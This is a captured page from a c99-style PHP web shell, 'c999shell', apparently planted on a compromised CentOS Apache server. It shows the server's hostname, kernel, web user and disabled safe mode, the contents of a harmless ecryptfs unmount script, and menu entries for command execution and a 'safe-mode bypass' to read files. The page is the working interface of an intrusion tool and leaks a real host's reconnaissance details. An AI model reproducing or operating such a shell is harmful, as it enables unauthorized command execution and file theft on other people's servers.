Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/bin/ drwxr-xr-x |
Viewing file: ecryptfs-umount-private (797 B) -rwxr-xr-x Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | #!/bin/sh -e # This script unmounts a user's private ecryptfs folder # and clears the kernel keyring of the relevant keys # # Original by Michael Halcrow, IBM # Extracted to a stand-alone script by Dustin Kirkland <kirkland@canonical.com> if grep -qs "$HOME/.Private $PWD ecryptfs " /proc/mounts 2>/dev/null; then pwd_mounted=1 fi out=`/sbin/umount.ecryptfs_private 2>&1` if [ -n "$out" ]; then echo "$out" fi if echo "$out" | grep -q -v "Sessions still open"; then for sig in `cat "$HOME/.ecryptfs/Private.sig"`; do key_id=`keyctl show | grep "$sig$" | awk '{print $1}'` keyctl unlink "$key_id" @u done fi if [ "$pwd_mounted" = "1" ]; then echo echo "INFO: Your private directory has been unmounted." echo "INFO: To see this change in your current shell:" echo " cd $PWD" echo fi |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0054 ]-- |